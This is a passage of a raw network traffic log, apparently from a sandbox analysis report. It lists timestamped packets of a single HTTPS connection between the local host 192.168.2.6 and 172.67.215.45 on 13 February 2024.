Feb 13, 2024 21:13:55.025495052 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.025512934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.025562048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.025562048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.025568962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026149035 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026161909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026206017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.026213884 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026400089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026417017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.026468992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.026468992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.026475906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027090073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027102947 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027164936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.027164936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.027179956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027446032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027465105 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027493000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.027506113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.027549982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.028080940 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028094053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028137922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.028146029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028450966 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028467894 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028512955 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.028518915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.028529882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.029670954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.029684067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.029735088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.029742956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.029761076 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.029967070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.029983997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.030011892 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.030018091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.030034065 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031104088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031115055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031164885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031164885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031173944 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031430960 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031446934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031491041 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031498909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031508923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031519890 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031543016 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031543016 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031553984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031580925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031712055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031728983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031774044 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031774044 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031780958 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031811953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031825066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.031867027 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031867027 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.031874895 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032088995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032104969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032145977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.032154083 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032162905 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.032754898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032767057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.032845020 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.032854080 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033073902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033090115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033116102 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.033133984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033144951 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.033236027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033247948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033298016 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.033304930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033958912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.033977032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034024000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.034024000 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.034033060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034626961 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034638882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034678936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.034688950 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034738064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034753084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034790039 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.034795046 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.034820080 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.035053015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035068035 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035480976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.035495043 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035837889 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035856009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035907984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.035907984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.035914898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035950899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.035964012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036006927 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.036011934 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036612988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036632061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036684990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.036684990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.036695957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036905050 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.036916971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037487030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.037502050 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037694931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037709951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037755966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.037766933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037791014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.037796974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037812948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.037857056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.037857056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.037864923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038484097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038499117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038542032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.038564920 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038620949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038631916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.038682938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.038691044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039366007 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039382935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039431095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.039431095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.039439917 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039535999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039547920 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.039593935 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.039593935 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.039602041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040363073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040380001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040421963 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.040430069 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040440083 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.040590048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040601969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.040668964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.040676117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041306019 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041323900 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041373014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.041373014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.041382074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041390896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041409016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.041451931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.041451931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.041459084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042035103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042049885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042299032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042304993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.042311907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042345047 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042354107 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.042385101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042418957 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.042687893 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.042975903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.042990923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043042898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043047905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043098927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043116093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043133974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043133974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043140888 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043184042 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043184042 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043838978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043853045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043894053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043901920 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.043931961 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.043931961 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044019938 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044034958 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044094086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044094086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044101000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044131994 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044203997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044218063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044290066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044296980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044680119 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.044955015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.044970036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045002937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045017958 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045051098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045051098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045094967 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045108080 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045156002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045161963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045177937 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045207977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045789003 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045802116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045855045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045861959 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045871973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045909882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.045964956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.045980930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046032906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.046040058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046058893 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.046132088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.046623945 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046638966 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046753883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046766996 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.046778917 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.046828032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.046828032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.047544956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.047559023 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.047616959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.047625065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.047889948 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.047909021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.047957897 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.047957897 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.047966957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048506975 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048520088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048583984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048583984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048583984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048598051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048624992 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048634052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048634052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048648119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048686981 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048753023 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048767090 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048823118 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.048829079 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.048911095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.049562931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.049577951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.049628019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.049628019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.049635887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.049671888 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.049962997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.049978018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050132990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.050139904 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050192118 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.050265074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050278902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050333977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.050342083 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050381899 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.050915956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.050930023 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051063061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.051070929 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051134109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.051163912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051177979 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051259995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051275969 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.051282883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.051305056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.051373959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.052084923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052100897 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052153111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.052160025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052191973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052211046 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052234888 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.052241087 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052270889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.052985907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.052999020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053046942 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053057909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053081036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053097963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053132057 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053132057 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053139925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053646088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053659916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053694010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053703070 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053735971 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053838015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053858995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.053905010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053905964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.053915977 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054498911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054512978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054605007 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.054613113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054766893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054783106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054840088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.054840088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.054848909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054935932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.054948092 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055016041 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.055016041 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.055023909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055597067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055613995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055656910 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.055664062 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055675983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.055773973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.055787086 CET	443	49701	172.67.215.45	192.168.2.6
